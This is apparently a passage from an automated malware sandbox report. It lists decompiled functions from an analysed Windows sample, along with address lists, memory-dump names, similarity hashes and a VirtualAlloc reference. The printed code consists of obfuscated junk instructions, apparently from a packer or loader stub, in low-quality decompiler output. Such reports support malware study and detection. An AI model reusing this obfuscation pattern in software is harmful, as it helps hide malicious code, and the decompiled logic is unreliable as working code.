					asm("pcmpgtw mm6, mm2");
					asm("fcomp st0, st3");
					asm("clc");
					__ecx = 0x364e;
					asm("cld");
					asm("fxch st0, st1");
					asm("fclex");
					__edi = __edi - 1;
					__edi = __edi + 1;
					__ecx = 0x16ba;
					asm("fdecstp");
					asm("fprem1");
					__edi = __edi - 1;
					__eflags = __edi;
					__edi = __edi + 1;
					__ecx = 0x16b9;
					asm("pcmpeqb mm3, mm6");
					asm("paddusw xmm1, xmm7");
					__ecx = 0x16ba;
					__ecx = 0x10cc;
					__eflags = 0x45f5;
					asm("int1");
					if (0x45f5 <= 0) goto L54;
					_push(es);
				}
			}

0x004027b0
0x0040279d
0x0040279d
0x0040279e
0x0040279f
0x004027a0
0x004027a1
0x004027a2
0x004027a3
0x004027a5
0x004027e7
0x004027e8
0x004027eb
0x00402836
0x00402837
0x00402838
0x00402839
0x0040283b
0x0040288e
0x0040288f
0x0040288f
0x00402890
0x00402891
0x00402892
0x004028de
0x004028df
0x004028e1
0x00402699
0x0040269b
0x0040269c
0x004026a0
0x004026eb
0x004026ed
0x004026ee
0x004026f0
0x004026f2
0x00402741
0x00402742
0x00402743
0x00402744
0x00402747
0x0040279b
0x0040279b
0x00000000
0x0040279b
0x004028e7
0x004028e8
0x004028ea
0x0040293c
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402996
0x00402997
0x00402999
0x004029dd
0x004029de
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a2f
0x00402a30
0x00402a34
0x00402a88
0x00402a89
0x00402a8a
0x00402a8c
0x00402adc
0x00402add
0x00402ae3
0x00402ae4
0x00402ae6
0x00402b2f
0x00402b30
0x00402b31
0x00402b32
0x00402b34
0x00402b7d
0x00402b83
0x00402b84
0x00402b85
0x00402b87
0x00402bd1
0x00402bd2
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c78
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc3
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e13
0x00402e18
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e60
0x00402e66
0x00402e67
0x00402e69
0x00402eb8
0x00402eb9
0x00402eba
0x00402ec0
0x00402ec2
0x00402f07
0x00402f07
0x00402f08
0x00402f09
0x00402f0a
0x00402f0d
0x00402f53
0x00402f54
0x00402f54
0x00402f55
0x00402f56
0x00402f57
0x00402f57

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 83bddc33119f4a24709cf0f86e6e1a4e9103814af80b93f5be7152ad2fb0d1e0
Instruction ID: d927a5ee36c6a7ab57c3b336803095b887057860ba7444277e2c132fc38d4f91
Opcode Fuzzy Hash: 83bddc33119f4a24709cf0f86e6e1a4e9103814af80b93f5be7152ad2fb0d1e0
Instruction Fuzzy Hash: B971BE5193EA44CAD217293086486715A48FF97343330EB7F89A7B60E1667E0E8B74CF

Uniqueness

Uniqueness Score: -1.00%

Function 004027C6, Relevance: 1.6, APIs: 1, Instructions: 356
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004027C6(void* __eax, unsigned char __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				unsigned char _t59;

				_t59 = __ebx;
				while(1) {
					asm("loope 0x68");
					asm("paddb xmm0, xmm0");
					asm("paddb mm0, mm0");
					asm("cld");
					_t59 = _t59 >> 0x3f;
					asm("aas");
					__eax = __eax - 1;
					asm("paddsw mm6, mm3");
					asm("psubw mm3, mm3");
					__eax = __eax + 1;
					asm("clc");
					__ecx = __ecx - 1;
					asm("fsubrp st4, st0");
					asm("fsqrt");
					__ecx = __ecx - 1;
					__ecx = __ecx + 1;
					__eflags = __ecx;
					__edi = __edi - 1;
					asm("wait");
					asm("fyl2xp1");
					__edi = __edi + 1;
					__eflags = __ecx;
					if(__ecx != 0) {
						asm("fnop");
						__edx = __edx - 1;
						asm("punpcklwd xmm5, xmm3");
						asm("fprem");
						__edx = __edx + 1;
						asm("wait");
						asm("fninit");
						__fp0 = __fp0 / st5;
						asm("pcmpgtd mm4, mm0");
						__ecx = __ecx - 1;
						__ecx = __ecx + 1;
						__edi = __edi - 1;
						asm("pxor mm6, mm4");
						asm("fdivr st7, st0");
						__edi = __edi + 1;
						__eflags = __edi;
						asm("clc");
						asm("fabs");
						continue;
					}
					asm("wait");
					asm("fclex");
					asm("packsswb mm5, mm1");
					__eax = __eax + 1;
					asm("fldl2t");
					asm("paddd xmm2, xmm0");
					__eax = __imp__#690;
					asm("clc");
					__ebx = __ebx - 1;
					asm("fst st1");
					asm("fdivrp st3, st0");
					__ebx = __ebx + 1;
					__ecx = 0x89d3ec;
					__edi = __edi - 1;
					asm("psubusb xmm4, xmm5");
					asm("psraw xmm0, xmm3");
					__edi = __edi + 1;
					0x89d3eb = 0x89d3ec;
					asm("packuswb xmm3, xmm5");
					asm("fyl2x");
					0xd4786f = 0xd4786e;
					__ecx = 0xd4786f;
					asm("fclex");
					asm("psrlq xmm7, 0xf4");
					asm("clc");
					__ecx = 0x97ad6e;
					__ebx = __ebx - 1;
					__fp0 = __fp0 - st3;
					asm("f2xm1");
					__ebx = __ebx + 1;
					__edx = __edx - 1;
					__edx = __edx + 1;
					asm("fcomp st0, st3");
					asm("emms");
					__ecx = 0x905a4d;
					asm("cld");
					__ecx = 0x905a4c;
					asm("fclex");
					asm("wait");
					__ecx = 0x905a4d;
					__esi = __esi - 1;
					__esi = __esi + 1;
					asm("fprem1");
					asm("wait");
					asm("fclex");
					asm("clc");
					do {
						__esi = __esi - 1;
						asm("paddusw xmm1, xmm7");
						asm("fldl2t");
						__esi = __esi + 1;
						__eax = __eax - 1;
						__eax = __eax + 1;
						asm("fldl2e");
						asm("fst st1");
						__eax = __eax - 1;
						asm("clc");
						__ecx = __ecx - 1;
						asm("fnop");
						asm("psubusb xmm4, xmm5");
						__ecx = __ecx + 1;
						__eflags =  *__eax - __ecx;
						asm("invalid");
						asm("fscale");
						asm("packuswb xmm3, xmm5");
						asm("invalid");
					} while (__eflags != 0);
					__edx = __edx - 1;
					asm("fsin");
					asm("fclex");
					__edx = __edx + 1;
					__eax = __eax - 1;
					__eax = __eax + 1;
					asm("fldz");
					__fp0 = __fp0 - st3;
					__ecx = 0x45f5;
					__edi = __edi - 1;
					__edi = __edi + 1;
					asm("pcmpgtw mm6, mm2");
					asm("fcomp st0, st3");
					asm("clc");
					__ecx = 0x364e;
					asm("cld");
					asm("fxch st0, st1");
					asm("fclex");
					__edi = __edi - 1;
					__edi = __edi + 1;
					__ecx = 0x16ba;
					asm("fdecstp");
					asm("fprem1");
					__edi = __edi - 1;
					__eflags = __edi;
					__edi = __edi + 1;
					__ecx = 0x16b9;
					asm("pcmpeqb mm3, mm6");
					asm("paddusw xmm1, xmm7");
					__ecx = 0x16ba;
					__ecx = 0x10cc;
					__eflags = 0x45f5;
					asm("int1");
					if (0x45f5 <= 0) goto L55;
					_push(es);
				}
			}

0x004027c6
0x0040279f
0x0040279f
0x004027a0
0x004027a1
0x004027a2
0x004027a3
0x004027a5
0x004027e7
0x004027e8
0x004027eb
0x00402836
0x00402837
0x00402838
0x00402839
0x0040283b
0x0040288e
0x0040288f
0x0040288f
0x00402890
0x00402891
0x00402892
0x004028de
0x004028df
0x004028e1
0x00402699
0x0040269b
0x0040269c
0x004026a0
0x004026eb
0x004026ed
0x004026ee
0x004026f0
0x004026f2
0x00402741
0x00402742
0x00402743
0x00402744
0x00402747
0x0040279b
0x0040279b
0x0040279d
0x0040279e
0x00000000
0x0040279e
0x004028e7
0x004028e8
0x004028ea
0x0040293c
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402996
0x00402997
0x00402999
0x004029dd
0x004029de
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a2f
0x00402a30
0x00402a34
0x00402a88
0x00402a89
0x00402a8a
0x00402a8c
0x00402adc
0x00402add
0x00402ae3
0x00402ae4
0x00402ae6
0x00402b2f
0x00402b30
0x00402b31
0x00402b32
0x00402b34
0x00402b7d
0x00402b83
0x00402b84
0x00402b85
0x00402b87
0x00402bd1
0x00402bd2
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c78
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc3
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e13
0x00402e18
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e60
0x00402e66
0x00402e67
0x00402e69
0x00402eb8
0x00402eb9
0x00402eba
0x00402ec0
0x00402ec2
0x00402f07
0x00402f07
0x00402f08
0x00402f09
0x00402f0a
0x00402f0d
0x00402f53
0x00402f54
0x00402f54
0x00402f55
0x00402f56
0x00402f57
0x00402f57

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 5ce23a0b81529c91428c284080c0eb1d05da0b2887640ec1346dfe9a93a22131
Instruction ID: 51f005bd27838d6932671edabfeb3e5a3fae412e07b83489c86d83bbd55c4ad3
Opcode Fuzzy Hash: 5ce23a0b81529c91428c284080c0eb1d05da0b2887640ec1346dfe9a93a22131
Instruction Fuzzy Hash: 7971B05193EA44C6D217293486486715948FF97343330EB7F89A7B60E1667E0E8B74CF

Uniqueness

Uniqueness Score: -1.00%

Function 00402946, Relevance: 1.6, APIs: 1, Instructions: 355memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a6be48c9beaa3463b10be0a101cdbdf938c1a2fde6f01cef82d35834deb77729
Instruction ID: 6a437fb7b093e18fab350f2f7742f7dbe1abf080476e3d2b046fb4ce560c548c
Opcode Fuzzy Hash: a6be48c9beaa3463b10be0a101cdbdf938c1a2fde6f01cef82d35834deb77729
Instruction Fuzzy Hash: 7C71B05192DB44CAD2172D3086486716A48FF93343330DBBF89A7760E2667E0E4B74CE

Uniqueness

Uniqueness Score: -1.00%

Function 004027CA, Relevance: 1.6, APIs: 1, Instructions: 355
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004027CA(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {

				while(1) {
					__bl = __bl >> 0x3f;
					__eflags = __bl;
					asm("aas");
					__eax = __eax - 1;
					asm("paddsw mm6, mm3");
					asm("psubw mm3, mm3");
					__eax = __eax + 1;
					asm("clc");
					__ecx = __ecx - 1;
					asm("fsubrp st4, st0");
					asm("fsqrt");
					__ecx = __ecx - 1;
					__ecx = __ecx + 1;
					__eflags = __ecx;
					__edi = __edi - 1;
					asm("wait");
					asm("fyl2xp1");
					__edi = __edi + 1;
					__eflags = __ecx;
					if(__ecx != 0) {
						asm("fnop");
						__edx = __edx - 1;
						asm("punpcklwd xmm5, xmm3");
						asm("fprem");
						__edx = __edx + 1;
						asm("wait");
						asm("fninit");
						__fp0 = __fp0 / st5;
						asm("pcmpgtd mm4, mm0");
						__ecx = __ecx - 1;
						__ecx = __ecx + 1;
						__edi = __edi - 1;
						asm("pxor mm6, mm4");
						asm("fdivr st7, st0");
						__edi = __edi + 1;
						__eflags = __edi;
						asm("clc");
						asm("fabs");
						asm("loope 0x68");
						asm("paddb xmm0, xmm0");
						asm("paddb mm0, mm0");
						asm("cld");
						continue;
					}
					asm("wait");
					asm("fclex");
					asm("packsswb mm5, mm1");
					__eax = __eax + 1;
					asm("fldl2t");
					asm("paddd xmm2, xmm0");
					__eax = __imp__#690;
					asm("clc");
					__ebx = __ebx - 1;
					asm("fst st1");
					asm("fdivrp st3, st0");
					__ebx = __ebx + 1;
					__ecx = 0x89d3ec;
					__edi = __edi - 1;
					asm("psubusb xmm4, xmm5");
					asm("psraw xmm0, xmm3");
					__edi = __edi + 1;
					0x89d3eb = 0x89d3ec;
					asm("packuswb xmm3, xmm5");
					asm("fyl2x");
					0xd4786f = 0xd4786e;
					__ecx = 0xd4786f;
					asm("fclex");
					asm("psrlq xmm7, 0xf4");
					asm("clc");
					__ecx = 0x97ad6e;
					__ebx = __ebx - 1;
					__fp0 = __fp0 - st3;
					asm("f2xm1");
					__ebx = __ebx + 1;
					__edx = __edx - 1;
					__edx = __edx + 1;
					asm("fcomp st0, st3");
					asm("emms");
					__ecx = 0x905a4d;
					asm("cld");
					__ecx = 0x905a4c;
					asm("fclex");
					asm("wait");
					__ecx = 0x905a4d;
					__esi = __esi - 1;
					__esi = __esi + 1;
					asm("fprem1");
					asm("wait");
					asm("fclex");
					asm("clc");
					do {
						__esi = __esi - 1;
						asm("paddusw xmm1, xmm7");
						asm("fldl2t");
						__esi = __esi + 1;
						__eax = __eax - 1;
						__eax = __eax + 1;
						asm("fldl2e");
						asm("fst st1");
						__eax = __eax - 1;
						asm("clc");
						__ecx = __ecx - 1;
						asm("fnop");
						asm("psubusb xmm4, xmm5");
						__ecx = __ecx + 1;
						__eflags =  *__eax - __ecx;
						asm("invalid");
						asm("fscale");
						asm("packuswb xmm3, xmm5");
						asm("invalid");
					} while (__eflags != 0);
					__edx = __edx - 1;
					asm("fsin");
					asm("fclex");
					__edx = __edx + 1;
					__eax = __eax - 1;
					__eax = __eax + 1;
					asm("fldz");
					__fp0 = __fp0 - st3;
					__ecx = 0x45f5;
					__edi = __edi - 1;
					__edi = __edi + 1;
					asm("pcmpgtw mm6, mm2");
					asm("fcomp st0, st3");
					asm("clc");
					__ecx = 0x364e;
					asm("cld");
					asm("fxch st0, st1");
					asm("fclex");
					__edi = __edi - 1;
					__edi = __edi + 1;
					__ecx = 0x16ba;
					asm("fdecstp");
					asm("fprem1");
					__edi = __edi - 1;
					__eflags = __edi;
					__edi = __edi + 1;
					__ecx = 0x16b9;
					asm("pcmpeqb mm3, mm6");
					asm("paddusw xmm1, xmm7");
					__ecx = 0x16ba;
					__ecx = 0x10cc;
					__eflags = 0x45f5;
					asm("int1");
					if (0x45f5 <= 0) goto L55;
					_push(es);
				}
			}

0x004027a3
0x004027a3
0x004027a3
0x004027a5
0x004027e7
0x004027e8
0x004027eb
0x00402836
0x00402837
0x00402838
0x00402839
0x0040283b
0x0040288e
0x0040288f
0x0040288f
0x00402890
0x00402891
0x00402892
0x004028de
0x004028df
0x004028e1
0x00402699
0x0040269b
0x0040269c
0x004026a0
0x004026eb
0x004026ed
0x004026ee
0x004026f0
0x004026f2
0x00402741
0x00402742
0x00402743
0x00402744
0x00402747
0x0040279b
0x0040279b
0x0040279d
0x0040279e
0x0040279f
0x004027a0
0x004027a1
0x004027a2
0x00000000
0x004027a2
0x004028e7
0x004028e8
0x004028ea
0x0040293c
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402996
0x00402997
0x00402999
0x004029dd
0x004029de
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a2f
0x00402a30
0x00402a34
0x00402a88
0x00402a89
0x00402a8a
0x00402a8c
0x00402adc
0x00402add
0x00402ae3
0x00402ae4
0x00402ae6
0x00402b2f
0x00402b30
0x00402b31
0x00402b32
0x00402b34
0x00402b7d
0x00402b83
0x00402b84
0x00402b85
0x00402b87
0x00402bd1
0x00402bd2
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c78
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc3
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e13
0x00402e18
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e60
0x00402e66
0x00402e67
0x00402e69
0x00402eb8
0x00402eb9
0x00402eba
0x00402ec0
0x00402ec2
0x00402f07
0x00402f07
0x00402f08
0x00402f09
0x00402f0a
0x00402f0d
0x00402f53
0x00402f54
0x00402f54
0x00402f55
0x00402f56
0x00402f57
0x00402f57

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c7c17b189761f13cea808f28a735cdd4bf3f998fadf7caeb138daeced7452da3
Instruction ID: 0f985bf507b721e2261f17dd73f953abf8d85f38e4adf1c6b6ee18b5d5277607
Opcode Fuzzy Hash: c7c17b189761f13cea808f28a735cdd4bf3f998fadf7caeb138daeced7452da3
Instruction Fuzzy Hash: 0971B05192EA44CAD217293486486715A48FF97343330EB7F89A7B60E166BE0E4B74CF

Uniqueness

Uniqueness Score: -1.00%

Function 004027B4, Relevance: 1.6, APIs: 1, Instructions: 355
memoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004027B4(void* __eax, unsigned char __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				unsigned char _t59;

				_t59 = __ebx;
				while(1) {
					asm("paddb mm0, mm0");
					asm("cld");
					_t59 = _t59 >> 0x3f;
					asm("aas");
					__eax = __eax - 1;
					asm("paddsw mm6, mm3");
					asm("psubw mm3, mm3");
					__eax = __eax + 1;
					asm("clc");
					__ecx = __ecx - 1;
					asm("fsubrp st4, st0");
					asm("fsqrt");
					__ecx = __ecx - 1;
					__ecx = __ecx + 1;
					__eflags = __ecx;
					__edi = __edi - 1;
					asm("wait");
					asm("fyl2xp1");
					__edi = __edi + 1;
					__eflags = __ecx;
					if(__ecx != 0) {
						asm("fnop");
						__edx = __edx - 1;
						asm("punpcklwd xmm5, xmm3");
						asm("fprem");
						__edx = __edx + 1;
						asm("wait");
						asm("fninit");
						__fp0 = __fp0 / st5;
						asm("pcmpgtd mm4, mm0");
						__ecx = __ecx - 1;
						__ecx = __ecx + 1;
						__edi = __edi - 1;
						asm("pxor mm6, mm4");
						asm("fdivr st7, st0");
						__edi = __edi + 1;
						__eflags = __edi;
						asm("clc");
						asm("fabs");
						asm("loope 0x68");
						asm("paddb xmm0, xmm0");
						continue;
					}
					asm("wait");
					asm("fclex");
					asm("packsswb mm5, mm1");
					__eax = __eax + 1;
					asm("fldl2t");
					asm("paddd xmm2, xmm0");
					__eax = __imp__#690;
					asm("clc");
					__ebx = __ebx - 1;
					asm("fst st1");
					asm("fdivrp st3, st0");
					__ebx = __ebx + 1;
					__ecx = 0x89d3ec;
					__edi = __edi - 1;
					asm("psubusb xmm4, xmm5");
					asm("psraw xmm0, xmm3");
					__edi = __edi + 1;
					0x89d3eb = 0x89d3ec;
					asm("packuswb xmm3, xmm5");
					asm("fyl2x");
					0xd4786f = 0xd4786e;
					__ecx = 0xd4786f;
					asm("fclex");
					asm("psrlq xmm7, 0xf4");
					asm("clc");
					__ecx = 0x97ad6e;
					__ebx = __ebx - 1;
					__fp0 = __fp0 - st3;
					asm("f2xm1");
					__ebx = __ebx + 1;
					__edx = __edx - 1;
					__edx = __edx + 1;
					asm("fcomp st0, st3");
					asm("emms");
					__ecx = 0x905a4d;
					asm("cld");
					__ecx = 0x905a4c;
					asm("fclex");
					asm("wait");
					__ecx = 0x905a4d;
					__esi = __esi - 1;
					__esi = __esi + 1;
					asm("fprem1");
					asm("wait");
					asm("fclex");
					asm("clc");
					do {
						__esi = __esi - 1;
						asm("paddusw xmm1, xmm7");
						asm("fldl2t");
						__esi = __esi + 1;
						__eax = __eax - 1;
						__eax = __eax + 1;
						asm("fldl2e");
						asm("fst st1");
						__eax = __eax - 1;
						asm("clc");
						__ecx = __ecx - 1;
						asm("fnop");
						asm("psubusb xmm4, xmm5");
						__ecx = __ecx + 1;
						__eflags =  *__eax - __ecx;
						asm("invalid");
						asm("fscale");
						asm("packuswb xmm3, xmm5");
						asm("invalid");
					} while (__eflags != 0);
					__edx = __edx - 1;
					asm("fsin");
					asm("fclex");
					__edx = __edx + 1;
					__eax = __eax - 1;
					__eax = __eax + 1;
					asm("fldz");
					__fp0 = __fp0 - st3;
					__ecx = 0x45f5;
					__edi = __edi - 1;
					__edi = __edi + 1;
					asm("pcmpgtw mm6, mm2");
					asm("fcomp st0, st3");
					asm("clc");
					__ecx = 0x364e;
					asm("cld");
					asm("fxch st0, st1");
					asm("fclex");
					__edi = __edi - 1;
					__edi = __edi + 1;
					__ecx = 0x16ba;
					asm("fdecstp");
					asm("fprem1");
					__edi = __edi - 1;
					__eflags = __edi;
					__edi = __edi + 1;
					__ecx = 0x16b9;
					asm("pcmpeqb mm3, mm6");
					asm("paddusw xmm1, xmm7");
					__ecx = 0x16ba;
					__ecx = 0x10cc;
					__eflags = 0x45f5;
					asm("int1");
					if (0x45f5 <= 0) goto L54;
					_push(es);
				}
			}

0x004027b4
0x004027a1
0x004027a1
0x004027a2
0x004027a3
0x004027a5
0x004027e7
0x004027e8
0x004027eb
0x00402836
0x00402837
0x00402838
0x00402839
0x0040283b
0x0040288e
0x0040288f
0x0040288f
0x00402890
0x00402891
0x00402892
0x004028de
0x004028df
0x004028e1
0x00402699
0x0040269b
0x0040269c
0x004026a0
0x004026eb
0x004026ed
0x004026ee
0x004026f0
0x004026f2
0x00402741
0x00402742
0x00402743
0x00402744
0x00402747
0x0040279b
0x0040279b
0x0040279d
0x0040279e
0x0040279f
0x004027a0
0x00000000
0x004027a0
0x004028e7
0x004028e8
0x004028ea
0x0040293c
0x0040293e
0x00402940
0x00402990
0x00402995
0x00402996
0x00402997
0x00402999
0x004029dd
0x004029de
0x004029e3
0x004029e4
0x004029e8
0x00402a2d
0x00402a2f
0x00402a30
0x00402a34
0x00402a88
0x00402a89
0x00402a8a
0x00402a8c
0x00402adc
0x00402add
0x00402ae3
0x00402ae4
0x00402ae6
0x00402b2f
0x00402b30
0x00402b31
0x00402b32
0x00402b34
0x00402b7d
0x00402b83
0x00402b84
0x00402b85
0x00402b87
0x00402bd1
0x00402bd2
0x00402bd3
0x00402bd4
0x00402bd6
0x00402bd7
0x00402c23
0x00402c24
0x00402c24
0x00402c25
0x00402c29
0x00402c77
0x00402c78
0x00402c79
0x00402c7a
0x00402c7c
0x00402cbd
0x00402cbe
0x00402cbf
0x00402cc0
0x00402cc2
0x00402d08
0x00402d09
0x00402d0b
0x00402d0e
0x00402d10
0x00402d62
0x00402d62
0x00402d6b
0x00402d6c
0x00402d6e
0x00402dc2
0x00402dc3
0x00402dc4
0x00402dc5
0x00402dc7
0x00402e13
0x00402e18
0x00402e19
0x00402e1a
0x00402e1d
0x00402e5f
0x00402e60
0x00402e66
0x00402e67
0x00402e69
0x00402eb8
0x00402eb9
0x00402eba
0x00402ec0
0x00402ec2
0x00402f07
0x00402f07
0x00402f08
0x00402f09
0x00402f0a
0x00402f0d
0x00402f53
0x00402f54
0x00402f54
0x00402f55
0x00402f56
0x00402f57
0x00402f57

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 96460bbdd7aa1b30a87aa95eb8277b9b2fed8e725f1b4af08d64c7c957e52fdd
Instruction ID: ee729cb3060109bf1477541c2da7fcd5cd28ff29726e53b10dccad63ee84fcd1
Opcode Fuzzy Hash: 96460bbdd7aa1b30a87aa95eb8277b9b2fed8e725f1b4af08d64c7c957e52fdd
Instruction Fuzzy Hash: 1571C05192EB44C6D217293086486715948FF93343330EB7F89A7B60E1667E0E8B74CF

Uniqueness

Uniqueness Score: -1.00%

Function 00402B8A, Relevance: 1.6, APIs: 1, Instructions: 349memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 857caa6760aa4fab670d0a93ed95203c580d68d6ff4ed5fcff296aa118987f31
Instruction ID: 9b19858603b3a15f770b7db8f91175c40038c7d95ee051674376930a849f17ef
Opcode Fuzzy Hash: 857caa6760aa4fab670d0a93ed95203c580d68d6ff4ed5fcff296aa118987f31
Instruction Fuzzy Hash: C051BE5192EB44CAD217292085486715A48EB97343730EBBB89A7760F2667E0F8B70CE

Uniqueness

Uniqueness Score: -1.00%

Function 0040299D, Relevance: 1.6, APIs: 1, Instructions: 345memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,0000B000), ref: 0040338A

Memory Dump Source

Source File: 00000000.00000002.733632055.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.733614784.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.733747863.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.733795083.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f59837362d7690ea56867b3648fefd6382d33e4ac983357ea1cda99c0ea3acfe
Instruction ID: 9fbdcc8d9d80ea51786b261b69bb23d9159280e56926c642533c87df1d06a40b
Opcode Fuzzy Hash: f59837362d7690ea56867b3648fefd6382d33e4ac983357ea1cda99c0ea3acfe
Instruction Fuzzy Hash: AE61BE5192EB44CAD217293486486715A48FF97343730EBBF89A7760E2667E0E4B34CE

Uniqueness

Uniqueness Score: -1.00%

Function 00402BDD, Relevance: 1.6, APIs: 1, Instructions: 338
memoryCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E00402BDD(signed int __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				signed int _t59;
				void* _t61;
				void* _t63;
				void* _t182;
				void* _t183;
				void* _t207;
				void* _t208;
				void* _t209;
				void* _t231;
				void* _t233;
				void* _t235;
				void* _t236;
				void* _t237;
				void* _t251;
				void* _t252;
				void* _t308;
				void* _t326;
				void* _t327;

				_t326 = __fp0;
				_t251 = __esi;
				_t231 = __edi;
				_t207 = __edx;
				_t182 = __ecx + 1;
				_t59 = __eax & 0x43434343;
				asm("clc");
				do {
					_t252 = _t251 - 1;
					asm("paddusw xmm1, xmm7");
					asm("fldl2t");
					_t251 = _t252 + 1;
					_t61 = _t59 - 1 + 1;
					asm("fldl2e");
					asm("fst st1");
					_t59 = _t61 - 1;
					asm("clc");
					_t183 = _t182 - 1;
					asm("fnop");
					asm("psubusb xmm4, xmm5");
					_t182 = _t183 + 1;
					_t308 =  *_t59 - _t182;
					asm("invalid");
					asm("fscale");
					asm("packuswb xmm3, xmm5");
					asm("invalid");
				} while (_t308 != 0);
				_t208 = _t207 - 1;
				asm("fsin");
				asm("fclex");
				_t209 = _t208 + 1;
				_t63 = _t59 - 1 + 1;
				asm("fldz");
				_t327 = _t326 - st3;
				_t233 = _t231 - 1 + 1;
				asm("pcmpgtw mm6, mm2");
				asm("fcomp st0, st3");
				asm("clc");
				asm("cld");
				asm("fxch st0, st1");
				asm("fclex");
